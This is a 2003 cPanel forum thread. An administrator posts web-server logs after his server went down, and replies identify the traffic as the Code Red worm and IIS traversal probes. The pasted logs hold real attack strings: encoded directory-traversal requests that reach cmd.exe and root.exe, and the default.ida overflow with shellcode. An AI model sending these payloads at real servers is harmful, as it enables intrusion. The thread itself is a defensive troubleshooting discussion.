Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

How to stop this process?

Discussion in 'General Discussion' started by tekdns, Jun 15, 2003.

  1. tekdns

    tekdns Well-Known Member

    Joined:
    Jun 9, 2002
    Messages:
    100
    Likes Received:
    0
    Trophy Points:
    316
    Hi,


    How to stop/block these below process;

    "12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:51 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 -
    127.0.0.1 - - [15/Jun/2003:04:35:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17184
    127.0.0.1 - - [15/Jun/2003:04:37:30 -0400] "GET / HTTP/1.0" 200 2673
    66.168.234.28 - - [15/Jun/2003:04:39:34 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:04:40:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17559
    218.70.224.215 - - [15/Jun/2003:04:40:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    217.219.246.4 - - [15/Jun/2003:04:44:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    66.190.164.146 - - [15/Jun/2003:04:44:56 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:57 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    127.0.0.1 - - [15/Jun/2003:04:45:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17966
    66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:02 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:03 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:04 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    66.190.164.146 - - [15/Jun/2003:04:45:05 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.190.164.146 - - [15/Jun/2003:04:45:07 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.190.164.146 - - [15/Jun/2003:04:45:08 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:09 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    127.0.0.1 - - [15/Jun/2003:04:45:50 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:04:50:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18253
    66.82.121.147 - - [15/Jun/2003:04:51:49 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:04:54:11 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:04:55:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18059
    66.227.42.208 - - [15/Jun/2003:04:57:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    66.31.55.164 - - [15/Jun/2003:04:57:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:47 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.126.168.169 - - [15/Jun/2003:04:57:48 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    24.130.75.129 - - [15/Jun/2003:04:58:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:05:00:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18040
    127.0.0.1 - - [15/Jun/2003:05:02:31 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:05:05:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18264
    12.224.137.0 - - [15/Jun/2003:05:08:53 -0400] "GET /..%255c..%280
    12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /msadc/

    ....................."

    Becouse, after these process, my server down.

    Thanks for your help

    cPanel.net Support Ticket Number:
     
    #1 tekdns, Jun 15, 2003
  2. promak

    promak Well-Known Member

    Joined:
    Oct 6, 2001
    Messages:
    248
    Likes Received:
    0
    Trophy Points:
    316
    This is code red
    try to search code red in this forums .

    cPanel.net Support Ticket Number:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #2 promak, Jun 15, 2003
  3. tAzMaNiAc

    tAzMaNiAc Well-Known Member

    Joined:
    Feb 16, 2003
    Messages:
    559
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Sachse, TX
    Those processes havenothing to do with why your server went down. Those are windows machines looking to attack windows machines with the IIS vulnerabilities.

    Unless you are running IIS and some strange configuration (CPanel DOES Not run IIS :-D), this is not the problem..

    Brenden

    cPanel.net Support Ticket Number:
     
    #3 tAzMaNiAc, Jun 16, 2003
  4. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,504
    Likes Received:
    1
    Trophy Points:
    318
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    It is possible that too many connection attempts were coming in too fast, creating a 'mini' DDOS attack. A brief look showed double-digit attempts per second.

    Do a search on this forum for 'sumthin' as there is some good information in one of the posts about what to do in these type situations.

    cPanel.net Support Ticket Number:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #4 Website Rob, Jun 16, 2003
(You must log in or sign up to post here.)
Loading...
Similar Threads - stop process
  1. linux.system25

    Stop MySQL Processes

    linux.system25, Mar 30, 2017, in forum: Database Discussion
    Replies:
    2
    Views:
    1,554
    vacancy
    Mar 30, 2017
  2. Chris Brown

    SOLVED PHP Process limit stopping script from running

    Chris Brown, Dec 9, 2016, in forum: Workarounds and Optimization
    Replies:
    7
    Views:
    1,630
    Infopro
    Dec 15, 2016
  3. pigbrain

    SOLVED How do I stop cpsrvd from listening on port 80?

    pigbrain, Nov 8, 2018, in forum: General Discussion
    Replies:
    2
    Views:
    121
    pigbrain
    Nov 9, 2018
  4. Islandhosting

    In Progress Plugins stop working after upgrade to cPanel & WHM version 76

    Islandhosting, Nov 7, 2018, in forum: cPanel Developers
    Replies:
    7
    Views:
    601
    cPanelMichael
    Nov 13, 2018
  5. cPanelMichael

    Incoming email stops working after v76 upgrade when using third-party Anti-spam DNSBL plugin

    cPanelMichael, Nov 6, 2018, in forum: General Discussion
    Replies:
    0
    Views:
    88
    cPanelMichael
    Nov 6, 2018

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Accept Learn More...
    Dismiss Notice